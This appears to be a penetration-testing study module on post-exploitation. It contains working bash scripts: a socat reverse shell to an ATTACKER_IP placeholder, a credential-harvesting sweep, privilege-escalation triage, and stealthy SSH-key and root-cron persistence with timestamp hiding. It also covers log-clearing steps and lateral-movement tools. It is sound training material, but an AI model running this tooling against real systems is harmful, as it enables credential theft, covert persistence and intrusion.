
07 - Post-Exploitation Methodology

# Overview

Post-exploitation is the phase after gaining initial access to a target system. The goal is to stabilize access, gather situational awareness, hunt for credentials, and pivot deeper into the network. A structured methodology prevents missed opportunities and minimizes detection risk.

# Priority Order

| Priority | Action | Goal |
|---|---|---|
| 1 | Stabilize Shell | Upgrade to a fully interactive TTY or a persistent agent |
| 2 | Situational Awareness | Understand the system, network, and domain context |
| 3 | Credential Hunting | Recover passwords, hashes, tokens, and keys |
| 4 | Local Privilege Escalation | Elevate from a low-privilege user to root/SYSTEM |
| 5 | Lateral Movement | Move to adjacent systems using harvested credentials |
| 6 | Persistence | Ensure future access survives reboots and lost shells |
| 7 | Pivoting | Tunnel through compromised hosts to reach segmented networks |
| 8 | Exfiltration / Objective | Retrieve flags or data, or achieve the engagement goal |

# Phase 1: Shell Stabilization

Immediately after catching a reverse shell, upgrade it. A bare reverse shell has no tab completion or arrow-key history, cannot run programs that need a terminal (su, ssh, vim, sudo password prompts), and a stray Ctrl-C kills the listener instead of the foreground process. Techniques vary by platform:

  • Linux: Python PTY spawn (or script), then stty raw -echo on the attacker side; socat for a full PTY when the target has no interpreter; rlwrap on the listener as a minimal fallback
  • Windows: there is no TTY to upgrade; wrap the listener in rlwrap, or use ConPtyShell for a real pseudo-console. PowerShell reverse shells, Nishang, Meterpreter stagers
  • See shell-upgrade-and-stabilization.md for full details
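A small helper for the Linux path above, added here as an example and not code from the module or the linked notes: given which PTY spawners exist on the target, it prints the exact paste-in sequence with the stty size taken from the attacker's own terminal, and falls back to the socat pair when there is no interpreter. Port 4444 and the ATTACKER_IP placeholder are assumptions.

```bash
#!/bin/bash
# Shell-upgrade runbook generator (added example, not from the module).
# Prints the paste-in sequence for the PTY trick, sized to the attacker's
# terminal, and falls back to socat when the target has no PTY spawner.

# pick_spawner "BINS": BINS is a space-separated list of binaries present
# on the TARGET (the output of `which python3 python script` typed into the
# dumb shell). Prints the best available spawner: python3, python, script.
pick_spawner() {
  for want in python3 python script; do
    for bin in $1; do
      [ "${bin##*/}" = "$want" ] || continue
      case "$want" in
        python3|python) printf '%s\n' "$want -c 'import pty; pty.spawn(\"/bin/bash\")'" ;;
        script)         printf '%s\n' "script -qc /bin/bash /dev/null" ;;
      esac
      return 0
    done
  done
  return 1
}

# term_size: rows and cols of the attacker's terminal, 24x80 when there is
# no tty. The remote stty must match or line editing and full-screen tools
# (vim, less, su prompts) misbehave.
term_size() {
  size=$(stty size 2>/dev/null) || size="24 80"
  printf '%s\n' "$size"
}

# socat_fallback: a full PTY with no interpreter on the target at all
socat_fallback() {
  cat <<'EOF'
# attacker: hand the listener's own tty to the connection
socat file:`tty`,raw,echo=0 tcp-listen:4444
# target: connect back with a real pty (ATTACKER_IP is a placeholder)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
EOF
}

# runbook "BINS": the three steps to paste, in order
runbook() {
  spawner=$(pick_spawner "$1") || { socat_fallback; return 1; }
  set -- $(term_size)
  cat <<EOF
# 1. in the dumb shell: get a pty
$spawner
# 2. Ctrl-Z, then on the attacker box: stop the local tty interpreting keys, resume
stty raw -echo; fg
# 3. back in the target shell: terminal type and size (must match the attacker side)
export TERM=xterm-256color
reset
stty rows $1 cols $2
EOF
}

# Example: a target that has script(1) and python3 but no python2
runbook "/usr/bin/script /usr/bin/python3"
```

Run it on the attacker box before pasting: the rows/cols it emits are the ones the remote stty needs, which is the step most often botched by hand.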

# Phase 2: Situational Awareness

Do not drop an enumeration script the moment you land. Start with quiet, built-in, read-only commands and escalate only once you know what is watching:

  1. Basic identity: whoami, id, whoami /all
  2. Network posture: interfaces, routes, listening ports, firewall rules
  3. OS and patches: uname -a, /etc/os-release, systeminfo, wmic qfe
  4. Users and groups: who, w, net user, net localgroup, domain group membership
  5. Running processes: ps aux, Get-Process, check for AV/EDR
  6. Domain context: set l, echo %logonserver%, nltest /dclist

See situational-awareness.md for exhaustive enumeration commands.

# Phase 3: Credential Hunting

Credentials are the currency of lateral movement. Systematic searching pays dividends:

  1. Configuration files: wp-config.php, .env, web.config, connectionStrings
  2. History files: .bash_history, .mysql_history, PSReadLine ConsoleHost_history.txt
  3. SSH keys: ~/.ssh/id_rsa and other private keys, plus authorized_keys (which accounts trust which keys)
  4. OS credential stores: /etc/shadow, SAM/SYSTEM hives, LSASS memory, DPAPI blobs
  5. Version control: git log -p, git show, .git-credentials
  6. Browser stores: Chrome, Firefox, Edge saved passwords
  7. Automation and deployment artifacts: Ansible Vault files, unattend.xml, sysprep.xml
  8. Domain-level stores: NTDS.dit, LAPS-managed local admin passwords, gMSA passwords

See credential-hunting.md for full methodology.
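The sweep above as one script, added here as an example rather than the module's own code: it covers the file-based sources (configuration files, history, SSH material, readable OS stores, git) on a Linux host and prints tab-separated findings. Windows-only and domain-level stores (LSASS, DPAPI, NTDS.dit, browser databases) are outside its scope. The regexes are a constructed starting set.

```bash
#!/bin/bash
# hunt_creds ROOT: sweep a tree for the file-based credential sources listed
# above and print "category<TAB>path<TAB>evidence". Added example, not from
# the module. Read-only; the patterns are a starting set to extend per target.

SECRET_RE='(passw(or)?d|pwd|secret|api[_-]?key|token|connectionstring)[[:space:]]*[=:"]'

hunt_creds() {
  root=${1:-/}

  # 1. Configuration files: names from the list plus the usual config suffixes
  find "$root" -xdev -type f -size -2048k \( -name 'wp-config.php' -o -name '.env' -o -name '.env.*' \
      -o -name 'web.config' -o -name '*.ini' -o -name '*.conf' -o -name '*.cfg' -o -name '*.yml' \
      -o -name '*.yaml' -o -name '*.json' -o -name '*.xml' -o -name '*.properties' \) 2>/dev/null |
  while read -r f; do
    grep -niE "$SECRET_RE" "$f" 2>/dev/null | head -3 | while read -r hit; do
      printf 'config\t%s\t%s\n' "$f" "$hit"
    done
  done

  # 2. History files: secrets that were typed on a command line (-pSecret, --password, sshpass)
  find "$root" -xdev -type f \( -name '.bash_history' -o -name '.zsh_history' -o -name '.mysql_history' \
      -o -name '.psql_history' -o -name 'ConsoleHost_history.txt' \) 2>/dev/null |
  while read -r f; do
    grep -niE '(^| )-p[^[:space:]-]|--password|sshpass|curl .*-u |passw(or)?d' "$f" 2>/dev/null | head -3 |
    while read -r hit; do printf 'history\t%s\t%s\n' "$f" "$hit"; done
  done

  # 3. SSH material: private keys, and authorized_keys (who else can get in)
  find "$root" -xdev -type f -path '*/.ssh/*' 2>/dev/null | while read -r f; do
    case "${f##*/}" in
      *.pub|known_hosts|config) ;;
      authorized_keys) printf 'ssh\t%s\t%s trusted keys\n' "$f" "$(grep -c . "$f")" ;;
      *) if head -1 "$f" | grep -q 'PRIVATE KEY'; then printf 'ssh\t%s\tprivate key\n' "$f"; fi ;;
    esac
  done

  # 4. OS credential stores: anything readable that should not be
  for f in /etc/shadow /etc/security/opasswd /etc/sudoers; do
    if [ -r "${root%/}$f" ]; then printf 'osstore\t%s\treadable\n' "${root%/}$f"; fi
  done

  # 5. Version control: stored HTTPS credentials (password redacted in the
  #    report) and secrets left in commit history
  find "$root" -xdev -type f -name '.git-credentials' 2>/dev/null | while read -r f; do
    printf 'git\t%s\t%s\n' "$f" "$(sed -E 's#://([^:/]+):[^@]+@#://\1:<redacted>@#' "$f" | head -1)"
  done
  find "$root" -xdev -type d -name '.git' 2>/dev/null | while read -r d; do
    if git -C "${d%/.git}" log -p --all 2>/dev/null | grep -qiE "$SECRET_RE"; then
      printf 'git\t%s\tsecret in commit history\n' "${d%/.git}"
    fi
  done
}

# Constructed demo tree so the output format can be seen without a target
demo=$(mktemp -d); mkdir -p "$demo/www" "$demo/home/u/.ssh"
printf 'DB_PASSWORD=hunter2\n' > "$demo/www/.env"
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'AAAA' > "$demo/home/u/.ssh/id_ed25519"
hunt_creds "$demo"; rm -rf "$demo"
```

On a target, hunt_creds / | sort -u is the usual invocation; expect the config category to be noisy on hosts with many YAML or JSON files and narrow SECRET_RE once you see what the application stack calls its secrets.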

# Phase 4: Local Privilege Escalation

Elevation paths differ by platform. Prioritize enumeration over blind exploit attempts:

  • Linux: SUID/SGID binaries, sudo -l, capabilities, cron jobs, writable services, kernel exploits
  • Windows: Service misconfigurations, token privileges, UAC bypass, scheduled tasks, DLL hijacking

Automated enumeration tools (linpeas.sh, WinPEAS, PowerUp.ps1) cover the common checks quickly, but they are well signatured and noisy: run them only after the AV/EDR check in Phase 2, and verify anything they flag by hand before attempting an exploit.
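Added example (not from the module): the Linux-side triage that turns raw SUID, capability and sudo -l output into the short list worth a manual look. The SUID baseline and the GTFOBins name list are constructed starting points for a Debian-style host; a binary absent from the baseline is a candidate, not a finding.

```bash
#!/bin/bash
# Linux privilege-escalation triage: reduce raw SUID, capability and sudo
# output to the entries worth a manual look. Added example, not from the
# module. Both lists are constructed starting points for a Debian-style
# host; adjust them to the target before trusting "nothing found".

# SUID binaries expected on a stock Debian/Ubuntu install (partial)
SUID_BASELINE='/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# Binaries that hand out a shell or arbitrary file access when SUID (see GTFOBins)
GTFO_SUID='bash sh dash zsh find vim vi nano less more env awk gawk python perl php ruby cp mv tar zip dd xxd base64 busybox docker systemctl'

# suspicious_suid: absolute SUID paths on stdin (from `find / -perm -4000 -type f`);
# prints the ones outside the baseline, tagged when the name is a known shell escape
# (python3.8 matches python, so versioned names are covered).
suspicious_suid() {
  while read -r p; do
    printf '%s\n' "$SUID_BASELINE" | grep -qxF "$p" && continue
    b=${p##*/}; tag=""
    for g in $GTFO_SUID; do
      case "$b" in "$g"|"$g"[0-9]*) tag=" [GTFOBins]"; break ;; esac
    done
    printf '%s%s\n' "$p" "$tag"
  done
}

# dangerous_caps: `getcap -r /` output on stdin; keeps capabilities that
# translate directly into root (setuid, ptrace, module load, DAC bypass)
dangerous_caps() {
  grep -E 'cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module|chown|fowner)' || true
}

# sudo_findings: `sudo -l` output on stdin; keeps rules with no password,
# wildcards, ALL, or an environment the target binary inherits
sudo_findings() {
  grep -E 'NOPASSWD|\(ALL|[*]|env_keep|LD_PRELOAD|LD_LIBRARY_PATH|SETENV' || true
}

# triage: run the filters against the live host
triage() {
  echo "== SUID outside baseline =="; find / -xdev -perm -4000 -type f 2>/dev/null | suspicious_suid
  echo "== capabilities ==";          getcap -r / 2>/dev/null | dangerous_caps
  echo "== sudo ==";                  sudo -n -l 2>/dev/null | sudo_findings
  echo "== world-writable cron/unit files =="
  find /etc/cron.d /etc/crontab /etc/systemd/system /lib/systemd/system -type f -perm -o+w 2>/dev/null
}

# Constructed sample, so the filters can be seen working without a target;
# on a real host call: triage
printf '/usr/bin/sudo\n/usr/bin/passwd\n/usr/bin/python3.8\n/opt/backup/run\n' | suspicious_suid
printf '/usr/bin/ping cap_net_raw=ep\n/usr/bin/python3.8 cap_setuid=ep\n' | dangerous_caps
```

The untagged entries (custom binaries under /opt, vendor helpers) are where the manual work goes: strings, ltrace, and a look at what they execute with relative paths.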

# Phase 5: Lateral Movement

With credentials and situational awareness, move to adjacent systems:

  1. Pass-the-Hash (PtH): NTLM hash reuse with crackmapexec (now NetExec), Impacket psexec and wmiexec
  2. Pass-the-Ticket (PtT): Kerberos ticket reuse with Rubeus on Windows, or Impacket with KRB5CCNAME on Linux
  3. WinRM: evil-winrm with harvested credentials or hashes
  4. SSH: harvested keys, and password reuse across systems
  5. RDP: xfreerdp with credentials (PtH only where Restricted Admin mode is enabled)
  6. Impacket exec family over SMB/RPC: smbexec, atexec (scheduled task), dcomexec (DCOM)

See pivoting-and-tunneling.md for moving through segmented networks.

# Phase 6: Persistence

Establish redundant access paths in case the primary shell dies, and record every change so it can be reverted in Phase 8 and reported:

  • SSH authorized_keys backdoor (keep file permissions and timestamps plausible)
  • Scheduled tasks / cron jobs
  • WMI event subscriptions
  • Service binary replacement (breaks the service and is noisy: last resort)
  • Web shells in writable directories

# Phase 7: Pivoting and Tunneling

When the target has internal network access (a second interface, routes to other subnets, trust relationships), use it as a jump host:

  • SSH dynamic forwarding (-D for a SOCKS proxy), paired with proxychains on the attacker side
  • Chisel (TCP/UDP tunnel over HTTP, SSH-encrypted, single static binary)
  • Ligolo-ng (modern tunneling with a TUN interface, so tools need no proxychains)
  • Metasploit autoroute + socks_proxy
  • netsh interface portproxy (Windows native port forwarding)

# Phase 8: Covering Tracks

  • Clear shell history: export HISTFILE=/dev/null, Remove-Item (Get-PSReadlineOption).HistorySavePath
  • Delete uploaded tools from writable temp directories
  • Remove added SSH keys, scheduled tasks, and user accounts
  • Clear event logs: wevtutil cl. Clearing the Security log itself writes Event ID 1102 (104 for other logs), which is a high-fidelity alert; on most engagements log clearing is out of scope and cleanup is limited to removing your own artifacts
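Phase 6 and Phase 8 belong together: what you add is what you must later remove. The following added example (not code from the module) installs the SSH-key and cron persistence from Phase 6 while writing a manifest, preserves the authorized_keys mtime so the file does not look freshly touched, and provides the revert that Phase 8 runs. The manifest path is an assumption, and the scratch-directory demonstration stands in for a real account.

```bash
#!/bin/bash
# Persistence that keeps a manifest of every change, plus the revert that
# Phase 8 runs. Added example, not from the module. Paths are parameters so
# it can be exercised against a scratch directory; the default manifest
# location is an assumption, pick something less obvious on a real target.

MANIFEST=${MANIFEST:-/tmp/.m-$$}

# Manifest lines are tab-separated:
#   dir    <.ssh directory we created>
#   sshkey <authorized_keys path> <existed 1|0> <key line>
#   cron   <cron.d-style file we created>

# add_ssh_key HOME PUBKEY: append PUBKEY once, keep the file's mtime so a
# fresh timestamp does not give it away, and log what was done.
add_ssh_key() {
  dir="$1/.ssh"; ak="$dir/authorized_keys"; key=$2
  if [ ! -d "$dir" ]; then
    mkdir -p "$dir" && chmod 700 "$dir"
    printf 'dir\t%s\n' "$dir" >> "$MANIFEST"
  fi
  existed=0; [ -f "$ak" ] && existed=1
  if [ "$existed" -eq 1 ] && grep -qxF "$key" "$ak"; then
    return 0                                    # already there, nothing to log
  fi
  ref=$(mktemp)
  [ "$existed" -eq 1 ] && touch -r "$ak" "$ref"  # remember the original mtime
  printf '%s\n' "$key" >> "$ak"
  chmod 600 "$ak"
  [ "$existed" -eq 1 ] && touch -r "$ref" "$ak"  # and put it back
  rm -f "$ref"
  printf 'sshkey\t%s\t%s\t%s\n' "$ak" "$existed" "$key" >> "$MANIFEST"
}

# add_cron FILE CMD: cron.d-style entry that re-launches CMD every five minutes as root
add_cron() {
  printf '*/5 * * * * root %s\n' "$2" > "$1"
  chmod 644 "$1"
  printf 'cron\t%s\n' "$1" >> "$MANIFEST"
}

# revert_all: undo the manifest in reverse order so nested changes unwind
# cleanly (key removed before its directory), then delete the manifest.
# The mtime of an edited authorized_keys is not restored here; note it.
revert_all() {
  [ -f "$MANIFEST" ] || return 0
  tab=$(printf '\t')
  awk '{ l[NR] = $0 } END { for (i = NR; i > 0; i--) print l[i] }' "$MANIFEST" |
  while IFS="$tab" read -r kind a b c; do
    case "$kind" in
      sshkey)
        if [ "$b" -eq 0 ]; then
          rm -f "$a"                             # we created it: remove outright
        else
          tmp=$(mktemp)
          grep -vxF "$c" "$a" > "$tmp" || true   # drop only our line, keep theirs
          cat "$tmp" > "$a"; rm -f "$tmp"        # cat, not mv: keeps inode and mode
        fi ;;
      dir)  rmdir "$a" 2>/dev/null || true ;;
      cron) rm -f "$a" ;;
    esac
  done
  rm -f "$MANIFEST"
}

# Demonstration in a scratch directory (constructed, not a real account)
demo=$(mktemp -d)
MANIFEST="$demo/manifest"
add_ssh_key "$demo/alice" "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOnlyNotReal ops"
add_cron "$demo/cron-entry" "/bin/true"
echo "manifest:"; cat "$MANIFEST"
revert_all
echo "after revert:"; ls -A "$demo"
rm -rf "$demo"
```

The same manifest doubles as the cleanup section of the report: every line is a change the client can verify was reverted.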

# Cross-References

## Source Machines

  • Escape (Medium, Windows) - MSSQL coerced auth, ESC1 ADCS attack
  • StreamIO (Medium, Windows) - MSSQL enumeration, BloodHound, LAPS
  • Support (Easy, Windows) - LDAP enumeration, RBCD attack
  • Cereal (Hard, Windows) - SeImpersonatePrivilege, SSRF, SweetPotato
  • Cerberus (Hard, Linux) - Firejail breakout, Kerberos cache, pivoting
  • Help (Easy, Linux) - Kernel exploit, GraphQL enumeration